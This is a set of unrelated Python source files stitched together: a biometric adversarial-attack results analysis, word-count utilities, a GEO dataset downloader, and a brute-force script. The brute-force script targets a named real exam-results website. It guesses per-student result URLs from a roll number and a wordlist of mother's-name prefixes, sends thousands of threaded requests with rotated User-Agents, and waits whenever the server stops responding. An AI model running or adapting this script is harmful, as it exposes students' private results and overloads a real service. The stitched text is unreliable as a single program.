            # but mismatches the training loss -- affects metrics only.
            self.model.compile(loss='mean_squared_error', optimizer=RMSprop())
        y_pred = np.argmax(self.model.predict([X for i in range(self.num_encoders)]), axis=1)
        return y_pred
|
#THIS PROGRAM SHOWS HOW BRUTE FORCE IS USED AGAINST WEBSITES. I HAVE GIVEN AN EXAMPLE USING A RESULTS WEBSITE. DO NOT MISUSE THIS PROGRAM; USE IT FOR READING PURPOSES ONLY. I AM NOT RESPONSIBLE FOR MISUSE OR ANY DAMAGE CAUSED BY THIS PROGRAM!
#THIS PROGRAM WORKS AS EXPECTED AND CAN CAUSE DAMAGE TO A SERVER. USE IT FOR READING PURPOSES, AND TEST SIMILAR PROGRAMS ONLY ON YOUR OWN WEBSITE FOR PENETRATION TESTING.
#useragents list
headers_useragents = []  # global User-Agent pool consumed by req(); filled by useragent_list()
def useragent_list():
    """(Re)populate the global ``headers_useragents`` pool and return it.

    The list is rebuilt from scratch on every call so repeated calls are
    idempotent; the original append-only version grew duplicates each
    time it was invoked.
    """
    global headers_useragents
    headers_useragents = [
        'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
        'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
        'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
        'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
        'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
        'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
        'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
        'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
    ]
    return(headers_useragents)
useragent_list()  # populate the global User-Agent pool once at startup
#background colors
class bcolors:
    """ANSI escape sequences for coloured terminal output."""
    HEADER = '\033[95m'
    OKBLUE = '\033[94m'
    OKGREEN = '\033[92m'
    WARNING = '\033[93m'
    FAIL = '\033[91m'
    ENDC = '\033[0m'  # reset to terminal default
    BOLD = '\033[1m'
    UNDERLINE = '\033[4m'
#libraries
import urllib2  # Python 2 only -- this whole script targets Python 2
import threading
from tqdm import tqdm
import random
import time
# Startup banner; %-interpolated with the colour codes from bcolors.
print('''
%s%s/===========================%sv1.0%s============================/
%s[[[[[[[[[[[[[[[[[[[[[[[[[[%sBrute Force Example%s]]]]]]]]]]]]]]]]]]]]]]]]]]
%s -<NAME>
\033[91mTHIS PROGRAM IS FOR SHOWING HOW BRUTE FORCE IS USED ON WEBSITES. I HAVE GIVEN EXAMPLE OF WEBSITE OF RESULTS. DO NOT MISUSE OF THIS PROGRAM USE IT FOR READING PURPOSE. I AM NOT RESPONSIBLE FOR MISUSE AND ANY DAMAGE CAUSED BY THIS PROGRAM!
THIS PROGRAM WORKS AS EXPECTED AND CAUSE DAMAGE TO SERVER. USE IT FOR READING PURPOSE AND TEST SIMILAR PROGRAM ON YOUR WEBSITE FOR PENETRATION TESTING\033[0m
'''%(bcolors.BOLD,bcolors.OKBLUE,bcolors.OKGREEN,bcolors.OKBLUE,bcolors.HEADER,bcolors.OKGREEN,bcolors.HEADER,bcolors.OKGREEN))
#main program starts here
#os.system("ulimit -Hn 4096") #increase open files limit
isfinished = False #flag to stop loop when result will found
#getting Seat no. and starting letter of mother name to reduce requests
#starting letter of mother's name is not necessary. Our wordlist will generate nearly 18000 URLs to find one result
rn = raw_input(bcolors.WARNING+"Always Check if website is working or not\nRoll No:")  # raw_input: Python 2
sname = raw_input("Mother's Starting Letter (if you guess):")
#function to send HTTP Requests
def req(url, i):
    """Probe *url*; if it responds successfully, print it and set the
    global stop flag.

    *i* is the attempt index; the first attempt echoes the URL so the
    operator can sanity-check the pattern. URL errors (404 etc.) are
    treated as "result not found" and ignored.
    """
    if i == 0:
        print("\033[F\033[KPlease confirm URL: " + url + "\n") #for checking
    global isfinished #access global scope variable, read by the main loop
    try:
        r = urllib2.Request(url)
        r.add_header('User-Agent', random.choice(headers_useragents))
        urllib2.urlopen(r)  # raises HTTPError (a URLError) on non-2xx
        print("\n\n" + bcolors.OKGREEN + url + "\n\n" + bcolors.OKBLUE)
        isfinished = True #We got link, lets break loop
    except urllib2.URLError:
        # Likely a 404 -- keep iterating. Narrowed from a bare `except:`
        # so programming errors are no longer silently swallowed.
        pass
#wordlist
# NOTE(review): the file handle leaks if an exception occurs before
# f.close(); a `with open(...)` block would be safer.
f=open("wordlist.txt","r")
arr=[] #array of starting 3 letters of mother's name
for line in f:
    if not sname=="": #guessing letter is given
        if line.startswith(sname):
            arr.append(line.replace("\n","")) #nearly 700 requests to be sent
    else:
        arr.append(line.replace("\n","")) #nearly 18000 requests to be sent
print(bcolors.BOLD+"Probability: 1/%d\n"%len(arr))
f.close()
www="www." # for sending requests by small change in URL
#large amount of requests can increase stress on server, check if server responding or not
def checkifurlkilled():
    """Return True when the target server responds again, False otherwise.

    Tries the 'www.' host first; on failure falls back to the bare host
    and records which prefix worked in the global ``www`` so the main
    loop builds reachable URLs.
    """
    global www
    try:
        r=urllib2.Request("http://www.sscresult.mkcl.org/")
        r.add_header("Referer","http://www.sscresult.mkcl.org/")
        urllib2.urlopen(r)
        print("\033[F\033[KResumed")
        www="www."
        return True
    # NOTE(review): both bare excepts below also swallow KeyboardInterrupt
    # and programming errors -- urllib2.URLError would be safer.
    except:
        print("\033[F\033[KWaiting for Server Response..."+random.choice(['.','..','...']))
        www=""
        try:
            urllib2.urlopen("http://sscresult.mkcl.org/")
            print("\033[F\033[KResumed")
            return True
        except:
            time.sleep(1) #give some time to rest server
            return False #for again executing this function
# Main loop: one threaded request per wordlist entry until a hit is found.
for i in tqdm(range(len(arr))):
    #break loop if URL is found
    if isfinished==True:
        print(bcolors.FAIL+"Breaking loop....."+bcolors.ENDC)
        break
    #After each 100 requests, check if server is dead
    if i%100==0:
        while True:
            if checkifurlkilled()==True:
                break
    #for Error: too many open files
    if i%600==0 and not i==0:
        #time.sleep(2) #increase time if this error occurs simultaneously
        pass
    #sending first 200 requests with 'www.'
    if i<200:
        t = threading.Thread(target=req,args=("http://www.sscresult.mkcl.org/result/A/%s_%s.html"%(rn,arr[i]),i,)) #using threading to send requests more rapidly
        t.start()
    else:
        # After the first 200 tries, use whichever prefix (www / bare)
        # checkifurlkilled() last found to be responsive.
        t = threading.Thread(target=req,args=("http://%ssscresult.mkcl.org/result/A/%s_%s.html"%(www,rn,arr[i]),i,))
        t.start()
#end
print(bcolors.ENDC)
#end colors
|
<reponame>sohailhabib/SecurityMetrics
from pathlib import Path
import numpy as np
import pandas as pd
import os
# from metrics.confusion_matrix import ConfusionMatrix
# from metrics.roc_curve import RocCurve
import matplotlib.pyplot as plt
from joblib import dump, load
import seaborn as sns
import glob
# Repository root: four directory levels above this file.
root_path = Path(__file__).parent.parent.parent.parent
# NOTE(review): Windows path separators ("\\") are hard-coded throughout,
# so this script is Windows-only as written.
plt_save_path = os.path.join(root_path, "experiment_results\\paper_plots\\")
# Biometric datasets and classifier types covered by the analysis.
data_sets = ['touch', 'keystroke', 'mouse', 'gait', 'voice']
# data_sets = ['touch', 'keystroke', 'mouse', 'gait']
clf_types = ['svm', 'knn', 'rf']
# Result-directory name per dataset.
touch_dir = "adv_attack_hmog"
keystroke_dir = "adv_attack_dsn_cv"
mouse_dir = "adv_attack_mouse"
gait_dir = "adv_attack_gait"
voice_dir = "adv_attack_voice"
# Glob patterns for the per-attack prediction CSVs, keyed by classifier.
hyp_at_f_name = {'svm': '*_hyp_at_prd_svm.csv', 'knn': '*_hyp_at_prd_knn.csv', 'rf': '*_hyp_at_prd_rf.csv'}
stat_at_f_name = {'svm': '*_stat_at_prd_svm.csv', 'knn': '*_stat_at_prd_knn.csv', 'rf': '*_stat_at_prd_rf.csv'}
kpp_at_f_name = {'svm': '*_kpp_at_prd_svm.csv', 'knn': '*_kpp_at_prd_knn.csv', 'rf': '*_kpp_at_prd_rf.csv'}
mk_at_f_name = {'svm': '*_mk_at_prd_svm.csv', 'knn': '*_mk_at_prd_knn.csv', 'rf': '*_mk_at_prd_rf.csv'}
exp_dir = {'touch': touch_dir, 'keystroke': keystroke_dir, 'mouse': mouse_dir, 'gait': gait_dir, 'voice': voice_dir}
exp_paths = {ds: os.path.join(root_path, f'experiment_results\\{exp_dir[ds]}\\')
             for ds in data_sets}
# Attack display name -> filename-pattern mapping.
at_file_names = {'Hypervolume': hyp_at_f_name, 'Vanilla-s': stat_at_f_name,
                 'K-means++': kpp_at_f_name, 'MasterKey': mk_at_f_name}
at_types = ['Hypervolume', 'Vanilla-s', 'K-means++', 'MasterKey']
gr_list = ['gr1', 'gr2']
# Number of clusters per dataset and user group.
gr_params = {"touch": {"gr1": 14,
                       "gr2": 12},
             "keystroke": {"gr1": 6,
                           "gr2": 7},
             "mouse": {"gr1": 6,
                       "gr2": 6},
             "gait": {"gr1": 5,
                      "gr2": 5},
             "voice": {"gr1": 8,
                       "gr2": 7},
             }
cluster_paths = {ds: os.path.join(exp_paths[ds], 'cluster_data\\') for ds in data_sets}
# NOTE(review): the glob pattern below does not interpolate `gr`, so both
# groups resolve the same file list and only the first match is read --
# confirm this is intended.
hyp_cls_scoring_paths = {ds: {gr: glob.glob(os.path.join(exp_paths[ds], f"*_hyp_cls_ranking.csv"))
                              for gr in gr_list} for ds in data_sets}
hyp_cls_scoring_files = {ds: {gr: pd.read_csv(hyp_cls_scoring_paths[ds][gr][0])
                              for gr in gr_list} for ds in data_sets}
# Accumulator for the top-6 cluster rankings per dataset/group.
cls_ol_rankings = pd.DataFrame(columns=['Biometric', 'group', 'cluster_number', 'mean_ol', 'cls_score'])
row = 0
# Collect the six best-ranked clusters for every dataset/group pair.
for ds in data_sets:
    for gr in gr_list:
        for rank in range(6):
            cls_ol_rankings.loc[row, 'Biometric'] = ds
            cls_ol_rankings.loc[row, 'group'] = gr
            cls_ol_rankings.loc[row, 'mean_ol'] = hyp_cls_scoring_files[ds][gr].mean_ol.iloc[rank]
            cls_ol_rankings.loc[row, 'cluster_number'] = hyp_cls_scoring_files[ds][gr].cluster_number.iloc[rank]
            cls_ol_rankings.loc[row, 'cls_score'] = hyp_cls_scoring_files[ds][gr].cls_score.iloc[rank]
            row += 1
# Paths and contents of every per-cluster CSV (cls_group_<g>_<cluster>.csv).
cluster_data_path = {ds: {gr: {cls: os.path.join(cluster_paths[ds], f"cls_group_{gr[-1]}_{cls}.csv")
                               for cls in range(gr_params[ds][gr])}
                          for gr in gr_list}
                     for ds in data_sets}
cls_data = {ds: {gr: {cls: pd.read_csv(cluster_data_path[ds][gr][cls])
                      for cls in range(gr_params[ds][gr])}
                 for gr in gr_list}
            for ds in data_sets}
# Attack-prediction files: dataset -> attack -> classifier -> glob matches,
# then loaded into DataFrames keyed by the file-name prefix (the group id).
at_prd_file_names = {ds: {at: {clf: glob.glob(os.path.join(exp_paths[ds], at_file_names[at][clf]))
                               for clf in clf_types}
                          for at in at_types}
                     for ds in data_sets}
at_prd_files = {ds: {at: {clf: {f.split("\\")[-1].split('_')[0]: pd.read_csv(f)
                                for f in at_prd_file_names[ds][at][clf]}
                          for clf in clf_types}
                     for at in at_types}
                for ds in data_sets}
gr_list = ['gr1', 'gr2']  # NOTE(review): redundant -- already defined above.
# Hypervolume attack scores per group.
hyp_cls_score = {ds: {gr: pd.read_csv(os.path.join(exp_paths[ds], f"{gr}_hyp_at_score.csv")) for gr in gr_list}
                 for ds in data_sets}
# Cluster ids present in each Hypervolume prediction table.
hyp_cls_info = {ds: {clf: {gr: at_prd_files[ds]['Hypervolume'][clf][gr].cluster_number.unique()
                           for gr in gr_list}
                     for clf in clf_types}
                for ds in data_sets}
# Hypervolume predictions split per cluster (cluster_number column dropped).
at_cls_dat = {
    ds: {
        clf: {
            gr: {
                cls: at_prd_files[ds]['Hypervolume'][clf][gr]
                [at_prd_files[ds]['Hypervolume'][clf][gr].cluster_number == cls].drop('cluster_number', axis=1)
                for cls in hyp_cls_info[ds][clf][gr]}
            for gr in gr_list}
        for clf in clf_types}
    for ds in data_sets}
# For each try (row) of each cluster: the users whose prediction == 1,
# i.e. the accounts bypassed on that attempt.
user_crk = {
    ds: {
        clf: {
            gr: {
                cls: {
                    tr: at_cls_dat[ds][clf][gr][cls].iloc[tr, :]
                    [at_cls_dat[ds][clf][gr][cls].iloc[tr, :] == 1].index.to_numpy()
                    for tr in range(len(at_cls_dat[ds][clf][gr][cls]))}
                for cls in hyp_cls_info[ds][clf][gr]}
            for gr in gr_list}
        for clf in clf_types}
    for ds in data_sets}
# Cracked-user arrays padded into DataFrames (one column per try).
user_crk_comb = {
    ds: {clf: {gr: {cls: pd.DataFrame.from_dict(dict([(k, pd.Series(v))
                                                      for k, v in user_crk[ds][clf][gr][cls].items()]))
                    for cls in hyp_cls_info[ds][clf][gr]}
               for gr in gr_list}
         for clf in clf_types}
    for ds in data_sets}
# Re-pivot the first three tries: try -> cluster -> cracked users.
user_crk_1 = {
    ds: {clf: {gr: {tr: {cls: user_crk[ds][clf][gr][cls][tr] for cls in hyp_cls_info[ds][clf][gr]}
                    for tr in range(3)}
               for gr in gr_list}
         for clf in clf_types}
    for ds in data_sets}
user_crk_comb_1 = {
    ds: {clf: {gr: {tr: pd.DataFrame.from_dict(dict([(k, pd.Series(v))
                                                     for k, v in user_crk_1[ds][clf][gr][tr].items()]))
                    for tr in range(3)}
               for gr in gr_list}
         for clf in clf_types}
    for ds in data_sets}
# Writing file to disk
hyp_data_save_path = os.path.join(plt_save_path, 'hyp_at_usr_analysis')
for ds in data_sets:
    for clf in clf_types:
        for gr in gr_list:
            for tr in range(3):
                user_crk_comb_1[ds][clf][gr][tr].columns.name = "cluster_number"
                # NOTE(review): mixed "//" and "\\" separators; also relies
                # on the per-dataset target directory already existing.
                user_crk_comb_1[ds][clf][gr][tr].to_csv(
                    os.path.join(hyp_data_save_path, f"{ds}//usr_crk_{gr}_{clf}_{tr}.csv"), index=True, mode='w+')
# Drop the cluster id from the Hypervolume tables; from here on every
# remaining column is treated as a user.
for ds in data_sets:
    for clf in clf_types:
        for gr in gr_list:
            at_prd_files[ds]['Hypervolume'][clf][gr] = \
                at_prd_files[ds]['Hypervolume'][clf][gr].drop('cluster_number', axis=1)
a = 1  # NOTE(review): leftover debug statement -- unused.
# Cumulative fraction of users cracked per attempt, per dataset/clf/group.
per_usr_cracked_dict = {ds: {clf: {gr: pd.DataFrame(columns=at_types)
                                   for gr in gr_list}
                             for clf in clf_types}
                        for ds in data_sets}
row_range = 50  # number of attack attempts considered
for ds in data_sets:
    for at in at_types:
        for clf in clf_types:
            for gr in gr_list:
                cracked_user = np.empty(0)
                users = at_prd_files[ds][at][clf][gr].columns.to_numpy()
                for row in range(row_range):
                    # Users whose prediction is 1 on this attempt.
                    at_cracked_user = \
                        at_prd_files[ds][at][clf][gr].iloc[row, :][
                            at_prd_files[ds][at][clf][gr].iloc[row, :] == 1].index.to_numpy()
                    cracked_user = np.unique(np.append(cracked_user, at_cracked_user))
                    # Cumulative fraction of distinct users cracked so far.
                    per_usr_cracked = np.round(len(cracked_user) / len(users), 5)
                    per_usr_cracked_dict[ds][clf][gr].loc[row, at] = per_usr_cracked
# Long-format frames (try_num / per_crk / at_type), averaged over groups.
per_usr_cracked_dict_comb = {ds: {clf: {at: pd.DataFrame(columns=['try_num', 'per_crk', 'at_type']) for at in at_types}
                                  for clf in clf_types}
                             for ds in data_sets}
plt_df = {ds: {clf: pd.DataFrame(columns=['try_num', 'per_crk', 'at_type'])
               for clf in clf_types}
          for ds in data_sets}
for ds in data_sets:
    for clf in clf_types:
        for at in at_types:
            for row in range(row_range):
                per_usr_cracked_dict_comb[ds][clf][at].loc[row, 'try_num'] = row + 1
                val_1 = per_usr_cracked_dict[ds][clf]['gr1'].loc[row, at]
                val_2 = per_usr_cracked_dict[ds][clf]['gr2'].loc[row, at]
                val_3 = np.round(np.mean([val_1, val_2]), 5)  # mean over both groups
                per_usr_cracked_dict_comb[ds][clf][at].loc[row, "per_crk"] = val_3
                per_usr_cracked_dict_comb[ds][clf][at].loc[row, "at_type"] = at
            per_usr_cracked_dict_comb[ds][clf][at].try_num = \
                per_usr_cracked_dict_comb[ds][clf][at].try_num.astype("float64")
            per_usr_cracked_dict_comb[ds][clf][at]["per_crk"] = \
                per_usr_cracked_dict_comb[ds][clf][at]["per_crk"].astype("float64")
            per_usr_cracked_dict_comb[ds][clf][at]["at_type"] = \
                per_usr_cracked_dict_comb[ds][clf][at]["at_type"].astype("string")
        # Prepend a (0, 0) origin row to each attack's curve.
        per_usr_cracked_dict_comb[ds][clf]['Hypervolume'] = \
            pd.concat([pd.DataFrame({'try_num': 0, 'per_crk': 0, 'at_type': 'Hypervolume'}, index=[0]),
                       per_usr_cracked_dict_comb[ds][clf]['Hypervolume']]).reset_index(drop=True)
        per_usr_cracked_dict_comb[ds][clf]['Vanilla-s'] = \
            pd.concat([pd.DataFrame({'try_num': 0, 'per_crk': 0, 'at_type': 'Vanilla-s'}, index=[0]),
                       per_usr_cracked_dict_comb[ds][clf]['Vanilla-s']]).reset_index(drop=True)
        per_usr_cracked_dict_comb[ds][clf]['K-means++'] = \
            pd.concat([pd.DataFrame({'try_num': 0, 'per_crk': 0, 'at_type': 'K-means++'}, index=[0]),
                       per_usr_cracked_dict_comb[ds][clf]['K-means++']]).reset_index(drop=True)
        per_usr_cracked_dict_comb[ds][clf]['MasterKey'] = \
            pd.concat([pd.DataFrame({'try_num': 0, 'per_crk': 0, 'at_type': 'MasterKey'}, index=[0]),
                       per_usr_cracked_dict_comb[ds][clf]['MasterKey']]).reset_index(drop=True)
        # Stack the four attacks into one frame for seaborn.
        plt_df[ds][clf] = pd.concat([per_usr_cracked_dict_comb[ds][clf]['Hypervolume'],
                                     per_usr_cracked_dict_comb[ds][clf]['Vanilla-s'],
                                     per_usr_cracked_dict_comb[ds][clf]['K-means++'],
                                     per_usr_cracked_dict_comb[ds][clf]['MasterKey']])
sns.set_theme(context='poster', style="white", font_scale=1.75)
line_draw_list = [1, 5, 10, 20, 50]  # attempt counts highlighted on the plots
# One figure/axes per dataset x classifier combination.
fig_dict = {ds: {clf: plt.figure(figsize=(19.2, 10.8)) for clf in clf_types} for ds in data_sets}
ax_dict = {ds: {clf: fig_dict[ds][clf].add_subplot(111) for clf in clf_types} for ds in data_sets}
for ds in data_sets:
    for clf in clf_types:
        sns.lineplot(data=plt_df[ds][clf], x="try_num", y="per_crk", hue="at_type", ax=ax_dict[ds][clf])
        sns.scatterplot(data=plt_df[ds][clf].loc[line_draw_list, :], x="try_num", y="per_crk", hue="at_type",
                        ax=ax_dict[ds][clf], legend=None)
        ax_dict[ds][clf].legend(loc=(0.0, 1.01), ncol=4, columnspacing=1.0, handletextpad=0.4, handlelength=1.0,
                                frameon=False)
        ax_dict[ds][clf].set_ylabel("% Compromised")
        ax_dict[ds][clf].set_xlabel("Attempts to Bypass")
        ax_dict[ds][clf].set_ylim([-0.01, 1.01])
        # Dotted guides at the highlighted attempt counts.
        for x_pos in line_draw_list:
            ax_dict[ds][clf].axvline(x=x_pos, c='gray', alpha=0.99, linestyle='dotted')
        fig_dict[ds][clf].tight_layout()
        fig_dict[ds][clf].savefig(os.path.join(plt_save_path, f"{ds}_{clf}_at_{row_range}_comp.pdf"))
# Progressive variants: one figure per highlighted attempt count, plotting
# the curve only up to that attempt.
fig_dict_p = {ds: {clf: {line: plt.figure(figsize=(19.2, 10.8)) for line in line_draw_list}
                   for clf in clf_types} for ds in data_sets}
ax_dict_p = {ds: {clf: {line: fig_dict_p[ds][clf][line].add_subplot(111) for line in line_draw_list}
                  for clf in clf_types} for ds in data_sets}
for ds in data_sets:
    for clf in clf_types:
        for attempt, idx in zip(line_draw_list, range(len(line_draw_list))):
            sp_list = line_draw_list[:idx+1]
            lp_list = [0]
            lp_list.extend(sp_list)
            sns.lineplot(data=plt_df[ds][clf].loc[lp_list, :], x="try_num", y="per_crk",
                         hue="at_type", ax=ax_dict_p[ds][clf][attempt])
            sns.scatterplot(data=plt_df[ds][clf].loc[sp_list, :],
                            x="try_num", y="per_crk", hue="at_type",
                            ax=ax_dict_p[ds][clf][attempt], legend=None)
            ax_dict_p[ds][clf][attempt].legend(loc=(0.0, 1.01), ncol=4, columnspacing=1.0, handletextpad=0.4, handlelength=1.0,
                                               frameon=False)
            ax_dict_p[ds][clf][attempt].set_ylabel("% Compromised")
            ax_dict_p[ds][clf][attempt].set_xlabel("Attempts to Bypass")
            ax_dict_p[ds][clf][attempt].set_ylim([-0.01, 1.01])
            for x_pos in line_draw_list:
                ax_dict_p[ds][clf][attempt].axvline(x=x_pos, c='gray', alpha=0.99, linestyle='dotted')
            fig_dict_p[ds][clf][attempt].tight_layout()
            fig_dict_p[ds][clf][attempt].savefig(os.path.join(plt_save_path, f"{ds}_{clf}_at_{row_range}_comp-{idx}.png"))
# Summary tables for the paper: per-dataset/classifier crack rates per try.
paper_table = pd.DataFrame(columns=['Dataset', 'Classifier', 'Try', 'Hypervolume', 'Vanilla-s', 'K-means++',
                                    'MasterKey'])
paper_table_f = {ds: {clf: pd.DataFrame(columns=['try', 'Hypervolume', 'Vanilla-s', 'K-means++', 'MasterKey'])
                      for clf in clf_types}
                 for ds in data_sets}
for ds in data_sets:
    for clf in clf_types:
        for row in range(row_range + 1):  # +1 for the prepended origin row
            paper_table_f[ds][clf].loc[row, 'try'] = row
            paper_table_f[ds][clf].loc[row, 'Hypervolume'] = \
                plt_df[ds][clf][plt_df[ds][clf].at_type == "Hypervolume"].per_crk[row]
            paper_table_f[ds][clf].loc[row, 'Vanilla-s'] = \
                plt_df[ds][clf][plt_df[ds][clf].at_type == "Vanilla-s"].per_crk[row]
            paper_table_f[ds][clf].loc[row, 'K-means++'] = \
                plt_df[ds][clf][plt_df[ds][clf].at_type == "K-means++"].per_crk[row]
            paper_table_f[ds][clf].loc[row, 'MasterKey'] = \
                plt_df[ds][clf][plt_df[ds][clf].at_type == "MasterKey"].per_crk[row]
# row_list = [0, 4, 9, 14, 19, 24, 49]
# NOTE(review): row_list is only defined for row_range in {10, 50, 100};
# any other value raises NameError in the loop below.
if row_range == 10:
    row_list = [0, 2, 3, 4, 5, 6, 7, 8, 9]
elif row_range == 50:
    # row_list = [0, 1, 2, 3, 4, 5, 10, 15, 20, 25, 50]
    row_list = range(51)
elif row_range == 100:
    row_list = [0, 4, 9, 24, 49, 74, 99]
row_c = 0
for ds in data_sets:
    for clf in clf_types:
        for trn in row_list:
            paper_table.loc[row_c, 'Dataset'] = ds
            paper_table.loc[row_c, 'Classifier'] = clf
            paper_table.loc[row_c, 'Try'] = trn
            paper_table.loc[row_c, 'Hypervolume'] = paper_table_f[ds][clf].loc[trn, 'Hypervolume']
            paper_table.loc[row_c, 'Vanilla-s'] = paper_table_f[ds][clf].loc[trn, 'Vanilla-s']
            paper_table.loc[row_c, 'K-means++'] = paper_table_f[ds][clf].loc[trn, 'K-means++']
            paper_table.loc[row_c, 'MasterKey'] = paper_table_f[ds][clf].loc[trn, 'MasterKey']
            row_c += 1
paper_table.to_csv(os.path.join(plt_save_path, f"results_{row_range}_sum.csv"), index=False, mode='w+')
|
<filename>pywc_modules/utils.py
def stripNonAlphaNum(text):
    """Split *text* on runs of non-alphanumeric characters.

    Returns the resulting list of fragments; leading/trailing separators
    yield empty strings at the edges, matching re.split semantics.
    """
    import re
    word_boundary = re.compile(r"\W+", re.UNICODE)
    return word_boundary.split(text)
def readfile(filepath):
    """ Read a text file and return the content as string """
    import os, sys
    # Missing path: report and exit with status 2 (Python 2 print statement).
    if not os.path.isfile(filepath):
        print "File path : " ,filepath, " does not exist!"
        sys.exit(2)
    with open(filepath) as fp:
        return fp.read()
def readurl(urlsite):
""" Read a site url and return the content as string """
import urllib2
import re, sys
tagHtml = re.compile(r"<[^>]+>")
page = None
# Approprriate headers to avoid any 403 forbidden errors
hdr = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.3",
"Accept-Encoding": "none",
"Accept-Language": "en-US,en;q=0.8",
"Connection": "keep-alive"}
# Perform a HTTP request by passing URL and setting headers
req = urllib2.Request(urlsite, headers=hdr)
try:
page = urllib2.urlopen(req)
except:
print "Error: Cannot open url: ", urlsite, " !"
sys.exit(2)
# Read the response
content = page.read()
# Delete uneeded content
contentNoScript = re.sub(r"(\<script)\s*[^\>]*\>([^\<]*\<\/script>)", "", content)
contentNoScriptAndStyles = re.sub("r(\<style)\s*[^\>]*\>([^\<]*\<\/style>)", "", contentNoScript)
contentNoTags = tagHtml.sub("", contentNoScriptAndStyles)
contentUnescaped = re.sub(r"&(#?[xX]?(?:[0-9a-fA-F]+|\w{1,8}));", " ", contentNoTags)
return contentUnescaped
def numberOfChar(stringList):
    """Return the total number of characters across all strings in *stringList*."""
    total = 0
    for item in stringList:
        total += len(item)
    return total
def getargs(argv):
    """
    Returns given arguments into dict
    args :
     - -i <inputfile>|<url> (str) : input file's path
     - -l <lengthword> (int) : minimum word length to display
     - -n <wordoccur> (int) : minimum word times to display
     - -o <outputfile>"(str) : output file's path
    Return : dict
    """
    import sys, getopt
    argsDict = {}
    try:
        opts, args = getopt.getopt(argv, "hi:u:l:n:o:", ["ifile=","url=", "lword=", "nword=", "ofile="])
    except getopt.GetoptError:
        # Unknown option or missing value: print usage and exit (Python 2).
        print "main.py -i|-u <inputfile>|<url> -l <lengthword> -n <wordoccur> -o <outputfile>"
        sys.exit(2)
    if len(opts) == 0:
        # No options given at all: same usage message.
        print "main.py -i|-u <inputfile>|<url> -l <lengthword> -n <wordoccur> -o <outputfile>"
        sys.exit(2)
    for opt, arg in opts:
        if opt == "-h":
            #print "main.py -i <inputfile> -l <lengthword> -n <wordoccur> -o <outputfile>"
            argsDict["help"] = "Display help"
        elif opt in ("-i", "--ifile"):
            argsDict["inputfile"] = arg
        elif opt in ("-u", "--url"):
            argsDict["url"] = arg
        elif opt in ("-l", "--lword"):
            try:
                argsDict["lengthword"] = int(arg)
            except:
                print "Error: -l (--lword) argument must be a number!"
                sys.exit(2)
        elif opt in ("-n", "--nword"):
            try:
                argsDict["wordoccur"] = int(arg)
            except:
                print "Error: -n (--nword) argument must be a number!"
                sys.exit(2)
        elif opt in ("-o", "--ofile"):
            argsDict["outputfile"] = arg
    return argsDict
|
from Module import AbstractModule
class Module(AbstractModule):
    """BETSY module: download GEO expression files for a GSE series,
    optionally restricted to one GPL platform, into *outfile*."""

    def __init__(self):
        AbstractModule.__init__(self)

    def run(
        self, network, antecedents, out_attributes, user_options, num_cores,
        outfile):
        """given a database ID and GPLID, get the files"""
        from Betsy import module_utils
        # BUG FIX: filelib was referenced below but never imported, so the
        # final sanity check raised NameError instead of reporting a bad
        # download. (genomicode is already a dependency of this module.)
        from genomicode import filelib
        #in_data = antecedents
        GSEID = user_options['GSEID']
        GPLID = None
        if 'GPLID' in user_options:
            GPLID = user_options['GPLID']
        assert GSEID.startswith('GSE'), 'GSEID %s is not correct' % GSEID
        if not GPLID:
            # No platform given: keep the dominant chip's files.
            download_geo_with_GSEID(GSEID, outfile)
        else:
            assert GPLID.startswith('GPL'), 'GPLID %s is not correct' % GPLID
            download_geo_with_GPLID(GSEID, GPLID, outfile)
        assert filelib.exists_nz(outfile), (
            'the output file %s for download_geo_dataset_GPL fails' % outfile
        )

    def name_outfile(self, antecedents, user_options):
        """Return the output name derived from the GSEID."""
        from Betsy import module_utils
        original_file = module_utils.get_inputid(user_options['GSEID'])
        filename = 'expression_files_' + original_file
        return filename
def clean_cel_filename(cel_file):
    """Normalize a CEL file name to ``<stem>.CEL``.

    Names ending in 'cel'/'CEL' (case-insensitive) are assumed to carry a
    4-character '.CEL' suffix, which is stripped; the remaining stem is
    truncated at its first punctuation character, then '.CEL' is
    re-appended. Names without a CEL suffix are returned unchanged.
    """
    import string
    if not cel_file.upper().endswith('CEL'):
        return cel_file
    stem = cel_file[0:-4]  # drop '.CEL' (assumes the dot is present)
    # Index of the first occurrence of each punctuation char in the stem.
    # BUG FIX: the original scan started at index 1 of the punctuation set,
    # skipping its first character ('!'), and crashed with min() of an
    # empty list when only that character matched.
    cut_points = [stem.index(ch) for ch in string.punctuation if ch in stem]
    if cut_points:
        return stem[0:min(cut_points)] + '.CEL'
    return stem + '.CEL'
def download_geo_with_GSEID(GSEID, outfile):
    """Download all files for *GSEID*, pick the dominant chip's CEL files,
    and move them (plus the series-matrix files) into *outfile*.

    Python 2 code: uses the ``file()`` builtin and ``except E, x`` syntax.
    """
    import os
    import shutil
    from Betsy import module_utils
